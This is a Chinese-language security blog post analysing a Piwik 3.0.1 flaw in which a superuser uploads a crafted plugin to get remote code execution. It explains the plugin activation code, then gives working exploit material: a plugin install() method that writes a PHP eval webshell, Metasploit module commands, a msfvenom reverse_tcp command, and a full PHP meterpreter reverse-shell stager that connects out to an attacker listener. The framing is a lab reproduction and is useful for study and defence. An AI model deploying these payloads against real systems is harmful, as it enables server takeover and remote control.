<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> Piwik代码执行漏洞安全分析（附验证过程Getshell） · 浮萍's Blog</title><meta name="description" content="Piwik代码执行漏洞安全分析（附验证过程Getshell） - 浮萍"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/"><link rel="stylesheet" href="/css/apollo.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><link rel="search" type="application/opensearchdescription+xml" href="https://fuping.site/atom.xml" title="浮萍's Blog"><script src="//code.jquery.com/jquery-2.2.4.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="浮萍's Blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">主页</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">所有文章</a></li><li class="nav-list-item"><a href="/tags" target="_self" class="nav-list-link">标签</a></li><li class="nav-list-item"><a href="/about" target="_self" class="nav-list-link">关于</a></li><li class="nav-list-item"><a href="/atom.xml" target="_self" class="nav-list-link">RSS</a></li><li class="nav-list-item"><a href="/search" target="_self" class="nav-list-link search"><i class="fa fa-search" aria-hidden="true"></i></a></li></ul></header><main class="container"></main><div class="post"><article class="post-block"><h1 class="post-title">Piwik代码执行漏洞安全分析（附验证过程Getshell）</h1><div class="post-info">Jul 12, 2017<span class="categories"><i class="fa fa-bookmark" aria-hidden="true"></i></span><a href="/categories/Exploit/" class="post-category">#Exploit</a></div><div class="post-content"><h3 id="0x01-概述"><a href="#0x01-概述" class="headerlink" title="0x01 概述"></a>0x01 概述</h3><p><a href="https://piwik.org/" target="_blank" rel="noopener">Piwik</a>是一个PHP和MySQL的开放源代码的Web统计软件. 它给你一些关于你的网站的实用统计报告，比如网页浏览人数, 访问最多的页面, 搜索引擎关键词等等。</p>
<p>Piwik拥有众多不同功能的插件，你可以添加新的功能或是移除你不需要的功能，Piwik同样可以安装在你的服务器上面，数据就保存在你自己的服务器上面。你可以非常容易的插入统计图表到你的博客或是网站抑或是后台的控制面板中。安装完成后，你只需将一小段代码放到将要统计的网页中即可。</p>
<a id="more"></a>

<p>在17年2月份<a href="https://firefart.at/post/turning_piwik_superuser_creds_into_rce/" target="_blank" rel="noopener">FireFart</a>报告了一个Piwik超级用户获取远程代码执行的漏洞。该漏洞通过利用构造插件，然后利用超级用户上传并激活，在激活插件时会执行插件中的PayLoad，从而获取shell。本文将介绍一下漏洞原理、环境的搭建、PayLoad的构造以及漏洞的复现过程，如有不足，请多多指教。</p>
<h3 id="0x02-漏洞原理分析"><a href="#0x02-漏洞原理分析" class="headerlink" title="0x02 漏洞原理分析"></a>0x02 漏洞原理分析</h3><p>插件激活时请求的URL为：<br><a href="http://192.168.217.1/piwik-3.0.1/index.php?module=CorePluginsAdmin&amp;action=activate&amp;idSite=1&amp;period=day&amp;date=yesterday&amp;nonce=4fe9b3937078e06f3f24d45a53ee614c&amp;pluginName=ff" target="_blank" rel="noopener">http://192.168.217.1/piwik-3.0.1/index.php?module=CorePluginsAdmin&amp;action=activate&amp;idSite=1&amp;period=day&amp;date=yesterday&amp;nonce=4fe9b3937078e06f3f24d45a53ee614c&amp;pluginName=ff</a></p>
<p>代码定位到<code>piwik-3.0.1\plugins\CorePluginsAdmin\Controller.php</code>中的activate方法。</p>
<p>找到pluginManager调用的激活插件方法。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">activate</span><span class="params">($redirectAfter = true)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $pluginName = <span class="keyword">$this</span>-&gt;initPluginModification(<span class="keyword">static</span>::ACTIVATE_NONCE);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;dieIfPluginsAdminIsDisabled();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">$this</span>-&gt;pluginManager-&gt;activatePlugin($pluginName);<span class="comment">//激活插件</span></span><br><span class="line">        ....</span><br><span class="line">        <span class="comment">//省略部分代码</span></span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>然后往上翻，找到pluginManager变量。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> $pluginManager;</span><br><span class="line">....</span><br><span class="line"><span class="comment">//省略部分代码</span></span><br><span class="line"><span class="keyword">$this</span>-&gt;pluginManager = Plugin\Manager::getInstance();</span><br><span class="line">.....</span><br></pre></td></tr></table></figure>
<p>定位到<code>piwik-3.0.1\core\Plugin\Manager.php</code>文件，找到其activatePlugin方法。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">activatePlugin</span><span class="params">($pluginName)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">		....</span><br><span class="line">        <span class="comment">//省略部分代码</span></span><br><span class="line">        <span class="comment">// Load plugin</span></span><br><span class="line">        $plugin = <span class="keyword">$this</span>-&gt;loadPlugin($pluginName);</span><br><span class="line">        <span class="keyword">if</span> ($plugin === <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> \<span class="keyword">Exception</span>(<span class="string">"The plugin '$pluginName' was found in the filesystem, but could not be loaded.'"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;installPluginIfNecessary($plugin);</span><br><span class="line">        $plugin-&gt;activate();</span><br><span class="line">		....</span><br><span class="line">        <span class="comment">//省略部分代码</span></span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>
<p>loadPlugin是根据插件名字加载，最后生成一个类对象，可以直接调用其中的方法，其代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">loadPlugin</span><span class="params">($pluginName)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;loadedPlugins[$pluginName])) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;loadedPlugins[$pluginName];</span><br><span class="line">    &#125;</span><br><span class="line">    $newPlugin = <span class="keyword">$this</span>-&gt;makePluginClass($pluginName);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">$this</span>-&gt;addLoadedPlugin($pluginName, $newPlugin);</span><br><span class="line">    <span class="keyword">return</span> $newPlugin;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>installPluginIfNecessary方法是判断该插件是否安装，如果没有安装的话，调用executePluginInstall方法来安装，executePluginInstall方法执行了插件中的install()方法，然后再执行activate()方法。</p>
<p>由此可知，当激活插件时，会加载插件，将其生成为类对象。然后判断是否安装插件，如果没有安装，调用插件中的install()方法，再调用activate()方法。<br>接下来就开始搭建环境具体来实现一下。</p>
<h3 id="0x03-环境的搭建"><a href="#0x03-环境的搭建" class="headerlink" title="0x03 环境的搭建"></a>0x03 环境的搭建</h3><h4 id="1-准备工作"><a href="#1-准备工作" class="headerlink" title="1.准备工作"></a>1.准备工作</h4><p>主机：Windows10 x64</p>
<p>WEB环境：采用的是phpStudy集成环境（PHP/5.5.30，MySQL/5.5.47，Apache/2.4.18 ）</p>
<p>程序版本：<a href="https://www.exploit-db.com/apps/cec6f1b03cc8ed4e62754919c5922d42-piwik-3.0.1.tar.gz" target="_blank" rel="noopener">3.0.1</a>(也可以在<a href="https://builds.piwik.org/" target="_blank" rel="noopener">https://builds.piwik.org/</a> 下载)</p>
<h4 id="2-composer工具的安装"><a href="#2-composer工具的安装" class="headerlink" title="2.composer工具的安装"></a>2.composer工具的安装</h4><p>下载地址：<a href="https://getcomposer.org/Composer-Setup.exe" target="_blank" rel="noopener">https://getcomposer.org/Composer-Setup.exe</a></p>
<p>下载后直接运行Composer-Setup.exe进行安装。</p>
<p><img src="composer_setup_1.jpg" alt="composer安装"></p>
<p><img src="composer_setup_2.jpg" alt="选择PHP.exe的位置"></p>
<p>然后根据提示，继续下一步即可。</p>
<blockquote>
<p>注意：安装时PHP应开启php_openssl扩展，不然会报错。</p>
</blockquote>
<h4 id="3-Piwik程序的部署"><a href="#3-Piwik程序的部署" class="headerlink" title="3.Piwik程序的部署"></a>3.Piwik程序的部署</h4><p>将下载下来的程序源码解压到phpStudy下的WWW目录。这里我项目名字为piwik-3.0.1。</p>
<p>在piwik-3.0.1目录下执行<code>composer install</code>命令来安装项目所依赖的代码库。</p>
<p><img src="composer_setup_3.png" alt="依赖的代码库的安装"></p>
<p>安装后在项目的根目录会出现一个vendor文件夹。</p>
<p><img src="vendor_files.jpg" alt="vendor目录下文件"></p>
<p>访问<a href="http://192.168.217.1/piwik-3.0.1/" target="_blank" rel="noopener">http://192.168.217.1/piwik-3.0.1/</a> 开始进行安装</p>
<p><img src="Piwik_setup.jpg" alt="Piwik安装"></p>
<p>点击Next进行下一步安装。</p>
<p>数据库设置</p>
<p><img src="Piwik_Database_setup.png" alt="数据库设置"></p>
<p>超级用户设置</p>
<p><img src="Piwik_superUser_set.jpg" alt="超级用户设置"></p>
<p>之后进行系统的设置，这里就省略过程了。</p>
<p>安装完成后访问<a href="http://192.168.217.1/piwik-3.0.1/" target="_blank" rel="noopener">http://192.168.217.1/piwik-3.0.1/</a> 进行登陆。</p>
<p><img src="piwik_login.jpg" alt="piwik登陆人口"></p>
<blockquote>
<p>用户名/密码为第五步中设置的超级用户。</p>
</blockquote>
<h3 id="0x04-验证过程"><a href="#0x04-验证过程" class="headerlink" title="0x04 验证过程"></a>0x04 验证过程</h3><h4 id="1-漏洞产生原因及PayLoad的编写"><a href="#1-漏洞产生原因及PayLoad的编写" class="headerlink" title="1.漏洞产生原因及PayLoad的编写"></a>1.漏洞产生原因及PayLoad的编写</h4><p>Piwik默认在3.0.3之前允许自定义插件上传，当插件被激活时，install方法会被调用，会执行其中编写的PayLoad。</p>
<p>如果我们编写一个名字叫做pwned的插件，其文件结构为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwned/</span><br><span class="line">pwned/pwned.php</span><br><span class="line">pwned/plugin.json</span><br></pre></td></tr></table></figure>
<p>文件内容：</p>
<p>pwned.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Piwik</span>\<span class="title">Plugins</span>\<span class="title">pwned</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">pwned</span> <span class="keyword">extends</span> \<span class="title">Piwik</span>\<span class="title">Plugin</span> </span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">install</span><span class="params">()</span></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    <span class="comment">//要执行的Payload</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>plugin.json</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">"name"</span>: <span class="string">"pwned"</span>,<span class="comment">//插件名称</span></span><br><span class="line">  <span class="attr">"description"</span>: <span class="string">"DESCRIPTION"</span>,<span class="comment">//插件描述</span></span><br><span class="line">  <span class="attr">"version"</span>: <span class="string">"1.0"</span>,<span class="comment">//插件版本</span></span><br><span class="line">  <span class="attr">"theme"</span>: <span class="literal">false</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后将其压缩为zip格式的压缩文件。当插件上传后并被激活时，就会执行pwned.php中的payload。</p>
<h4 id="2-漏洞利用"><a href="#2-漏洞利用" class="headerlink" title="2.漏洞利用"></a>2.漏洞利用</h4><p><strong>PayLoad的准备</strong></p>
<p>修改上述的pwned.php代码，在install方法中添加写shell的代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Piwik</span>\<span class="title">Plugins</span>\<span class="title">pwned</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">pwned</span> <span class="keyword">extends</span> \<span class="title">Piwik</span>\<span class="title">Plugin</span> </span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">install</span><span class="params">()</span></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    $myfile = fopen(<span class="string">"shell.php"</span>, <span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to open file!"</span>);</span><br><span class="line">	$content = <span class="string">"&lt;?eval(\$_POST['pass']);?&gt;"</span>;</span><br><span class="line">	fwrite($myfile, $content);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>plugin.json不用做过多的修改。</p>
<p>然后压缩为pwned.zip。</p>
<p><strong>PayLoad的利用</strong></p>
<p>利用创建的超级用户登陆，登陆后点击Administration或者访问<a href="http://192.168.217.1/piwik-3.0.1/index.php?module=CoreAdminHome&amp;action=home&amp;idSite=1&amp;period=day&amp;date=yesterday" target="_blank" rel="noopener">http://192.168.217.1/piwik-3.0.1/index.php?module=CoreAdminHome&amp;action=home&amp;idSite=1&amp;period=day&amp;date=yesterday</a></p>
<p><img src="piwik_plugins.jpg" alt="piwik 插件人口"></p>
<p>安装新插件</p>
<p><img src="piwik_plugins_install.jpg" alt="piwik 安装新插件人口"></p>
<p>上传新插件</p>
<p><img src="piwik_plugins_upload.jpg" alt="piwik 插件市场"></p>
<p>插件上传</p>
<p><img src="piwik_plugins_uploading.jpg" alt="piwik 插件上传"></p>
<p>插件上传成功</p>
<p><img src="piwik_plugins_uploadsuccess.jpg" alt="piwik 插件上传成功"></p>
<p>然后点击激活插件按钮</p>
<p><img src="plugin_activated.jpg" alt="插件激活"></p>
<p>插件激活后，会在根目录生成一个shell.php</p>
<p><img src="shell.jpg" alt="shell"></p>
<h4 id="3-利用Metasploit生成meterpreter会话"><a href="#3-利用Metasploit生成meterpreter会话" class="headerlink" title="3.利用Metasploit生成meterpreter会话"></a>3.利用Metasploit生成meterpreter会话</h4><p>上面的结果是写入了WEBSHELL，也可以采用piwik_superuser_plugin_upload直接生成一个meterpreter会话。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">msf &gt; use exploit/unix/webapp/piwik_superuser_plugin_upload </span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; </span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; <span class="built_in">set</span> PASSWORD admin888</span><br><span class="line">PASSWORD =&gt; admin888</span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; <span class="built_in">set</span> RHOST 192.168.217.1</span><br><span class="line">RHOST =&gt; 192.168.217.1</span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; <span class="built_in">set</span> TARGETURI /piwik-3.0.1/</span><br><span class="line">TARGETURI =&gt; /piwik-3.0.1/</span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; <span class="built_in">set</span> USERNAME admin</span><br><span class="line">USERNAME =&gt; admin</span><br><span class="line">msf exploit(piwik_superuser_plugin_upload) &gt; exploit</span><br></pre></td></tr></table></figure>
<p><img src="msf_win01.jpg" alt="脚本说明"></p>
<p><img src="msf_win02.jpg" alt="成功反弹生成meterpreter会话"></p>
<blockquote>
<p>利用Metasploit时有时候会不成功，或者是第一次成功之后无法再次复现。但是利用上传webshell可以成功。</p>
</blockquote>
<h3 id="0x05-总结"><a href="#0x05-总结" class="headerlink" title="0x05 总结"></a>0x05 总结</h3><p>之前在3月份曾经遇到过类似的站点，然后本地搭建环境测试的时候，只顾着用Metasploit进测试，并没有出结果，就没继续下去了。最近又重新看了一下原理，然后实现并记录一下过程。</p>
<p>这里仅仅用3.0.1举例，根据<a href="https://github.com/rapid7/metasploit-framework/pull/7917" target="_blank" rel="noopener">firefart</a>说的影响版本2.14.0/2.16.0/2.17.1/3.0.1，其他并未测试。</p>
<p>Q:直接上传包含shell的压缩包可以吗？</p>
<p>A:可以上传成功，但在plugins目录下无法执行php代码。</p>
<p><img src="shell_forbidden.jpg" alt="plugins目录下无法执行php代码"></p>
<p>Q:Payload中除了install()方法还可以写其他方法吗？</p>
<p>A:可以的。例如还有uninstall/deactivate/activate等方法，分别在卸载插件/关闭插件/激活插件的时候调用。例如如下的代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Piwik</span>\<span class="title">Plugins</span>\<span class="title">ff</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ff</span> <span class="keyword">extends</span> \<span class="title">Piwik</span>\<span class="title">Plugin</span> </span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">install</span><span class="params">()</span>//安装插件，执行一次</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">	$myfile = fopen(<span class="string">"install.txt"</span>, <span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to open file!"</span>);</span><br><span class="line">	$content = <span class="string">"install ..."</span>;</span><br><span class="line">	fwrite($myfile, $content);</span><br><span class="line">  &#125;  </span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">uninstall</span><span class="params">()</span>//卸载插件，执行一次</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">	$myfile = fopen(<span class="string">"uninstall.txt"</span>, <span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to open file!"</span>);</span><br><span class="line">	$content = <span class="string">"uninstall ..."</span>;</span><br><span class="line">	fwrite($myfile, $content);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">deactivate</span><span class="params">()</span>//关闭插件，可以多次执行</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">	$myfile = fopen(<span class="string">"deactivate.txt"</span>, <span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to open file!"</span>);</span><br><span class="line">	$content = <span class="string">"deactivate ..."</span>;</span><br><span class="line">	fwrite($myfile, $content);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">activate</span><span class="params">()</span>//激活插件，可以多次执行</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">	$myfile = fopen(<span class="string">"activate.txt"</span>, <span class="string">"w"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Unable to open file!"</span>);</span><br><span class="line">	$content = <span class="string">"activate ..."</span>;</span><br><span class="line">	fwrite($myfile, $content);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Q:可以上传WEBSHELL，但是利用Metasploit无法生成meterpreter会话，还想反弹shell怎么办？</p>
<p><img src="msf_error.jpg" alt="无法生成meterpreter会话"></p>
<p>A:可以利用手动上传插件的方法，将其中的Payload修改为反弹shell的代码。</p>
<p>具体可以这样操作：</p>
<p>首先看看Metasploit利用的Payload是什么。</p>
<p>可以在generate_plugin方法中添加打印payload.encoded的语句，例如使用<code>print_status(&quot;data:#{payload.encoded}&quot;)</code>将其内容打印出来</p>
<p><img src="payload_getdata.jpg" alt="打印Payload"></p>
<p>然后使用<code>reload_all</code>重新加载脚本，并使用piwik_superuser_plugin_upload脚本，将会打印出来payload的内容</p>
<p><img src="payload_datas.jpg" alt="payload内容"></p>
<blockquote>
<p>或者可以利用<code>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.131.128 LPORT=4444 -f raw &gt;c.php</code>来生成payload，内容一样</p>
</blockquote>
<p>然后将生成的内容放在插件PHP代码中。整理格式后如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Piwik</span>\<span class="title">Plugins</span>\<span class="title">pwned</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">pwned</span> <span class="keyword">extends</span> \<span class="title">Piwik</span>\<span class="title">Plugin</span> </span>&#123;</span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">install</span><span class="params">()</span></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    error_reporting(<span class="number">0</span>); </span><br><span class="line">	$ip = <span class="string">'192.168.131.128'</span>; </span><br><span class="line">	$port = <span class="number">4444</span>; </span><br><span class="line">	<span class="keyword">if</span> (($f = <span class="string">'stream_socket_client'</span>) &amp;&amp; is_callable($f)) &#123;</span><br><span class="line">		$s = $f(<span class="string">"tcp://&#123;$ip&#125;:&#123;$port&#125;"</span>); $s_type = <span class="string">'stream'</span>;</span><br><span class="line">	&#125; <span class="keyword">elseif</span> (($f = <span class="string">'fsockopen'</span>) &amp;&amp; is_callable($f)) &#123;</span><br><span class="line">		$s = $f($ip, $port); $s_type = <span class="string">'stream'</span>; </span><br><span class="line">	&#125; <span class="keyword">elseif</span> (($f = <span class="string">'socket_create'</span>) &amp;&amp; is_callable($f)) &#123;</span><br><span class="line">		$s = $f(AF_INET, SOCK_STREAM, SOL_TCP); </span><br><span class="line">		$res = @socket_connect($s, $ip, $port); </span><br><span class="line">		<span class="keyword">if</span> (!$res) &#123; <span class="keyword">die</span>(); &#125; </span><br><span class="line">		$s_type = <span class="string">'socket'</span>; </span><br><span class="line">	&#125; <span class="keyword">else</span> &#123; </span><br><span class="line">		<span class="keyword">die</span>(<span class="string">'no socket funcs'</span>);</span><br><span class="line">	&#125; <span class="keyword">if</span> (!$s) &#123; <span class="keyword">die</span>(<span class="string">'no socket'</span>); &#125; </span><br><span class="line">	<span class="keyword">switch</span> ($s_type) &#123; </span><br><span class="line">		<span class="keyword">case</span> <span class="string">'stream'</span>: $len = fread($s, <span class="number">4</span>); <span class="keyword">break</span>; </span><br><span class="line">		<span class="keyword">case</span> <span class="string">'socket'</span>: $len = socket_read($s, <span class="number">4</span>); <span class="keyword">break</span>; </span><br><span class="line">	&#125; </span><br><span class="line">	<span class="keyword">if</span> (!$len) &#123; <span class="keyword">die</span>(); &#125; </span><br><span class="line">	$a = unpack(<span class="string">"Nlen"</span>, $len); </span><br><span class="line">	$len = $a[<span class="string">'len'</span>]; </span><br><span class="line">	$b = <span class="string">''</span>; </span><br><span class="line">	<span class="keyword">while</span> (strlen($b) &lt; $len) &#123; </span><br><span class="line">		<span class="keyword">switch</span> ($s_type) &#123; </span><br><span class="line">		<span class="keyword">case</span> <span class="string">'stream'</span>: $b .= fread($s, $len-strlen($b)); <span class="keyword">break</span>; </span><br><span class="line">		<span class="keyword">case</span> <span class="string">'socket'</span>: $b .= socket_read($s, $len-strlen($b)); <span class="keyword">break</span>; </span><br><span class="line">		&#125; </span><br><span class="line">	&#125; </span><br><span class="line">	$GLOBALS[<span class="string">'msgsock'</span>] = $s; </span><br><span class="line">	$GLOBALS[<span class="string">'msgsock_type'</span>] = $s_type; </span><br><span class="line">	<span class="keyword">eval</span>($b);</span><br><span class="line">	<span class="keyword">die</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后就是利用上传插件来上传插件并激活了。</p>
<p>正确姿势：</p>
<p><img src="msf_ubuntu_success.jpg" alt="msf_ubuntu_success"></p>
<blockquote>
<p>请注意要加<code>set PAYLOAD php/meterpreter/reverse_tcp</code>，不然会报各种错误。</p>
</blockquote>
<p>下面的为其中的错误。</p>
<p><img src="msf_ubuntu.jpg" alt="msf_ubuntu"></p>
<h3 id="0x06-参考"><a href="#0x06-参考" class="headerlink" title="0x06 参考"></a>0x06 参考</h3><p>[1]<a href="https://firefart.at/post/turning_piwik_superuser_creds_into_rce/" target="_blank" rel="noopener">https://firefart.at/post/turning_piwik_superuser_creds_into_rce/</a><br>[2]<a href="https://github.com/rapid7/metasploit-framework/pull/7917" target="_blank" rel="noopener">https://github.com/rapid7/metasploit-framework/pull/7917</a></p>
</div><p class="post-tags"><i class="fa fa-tags" aria-hidden="true"></i><a href="/tags/Metasploit/">#Metasploit</a><a href="/tags/piwik/">#piwik</a><a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">#漏洞分析</a></p></article></div><footer><div class="paginator"><a href="/2017/07/19/SQLite-Injection-Get-WebShell/" class="prev">PREV</a><a href="/2017/06/05/Weblogic-Vulnerability-Verification/" class="next">NEXT</a></div><div class="copyright"><p>© 2016 - 2021 <a href="https://fuping.site">浮萍</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script><script>(function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]=function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date;e=o.createElement(i);r=o.getElementsByTagName(i)[0];e.src='//www.google-analytics.com/analytics.js';r.parentNode.insertBefore(e,r)}(window,document,'script','ga'));ga('create',"UA-103156844-1",'auto');ga('send','pageview');</script><link rel="stylesheet" href="//cdn.datatables.net/1.10.7/css/jquery.dataTables.min.css" media="screen" type="text/css"><script src="//cdn.datatables.net/1.10.7/js/jquery.dataTables.min.js"></script><script>$(function(){$('.datatable').dataTable( {"order": [[ 0, "desc" ]],"iDisplayLength": -1,"lengthMenu": [[10, 25, 50, -1], [10, 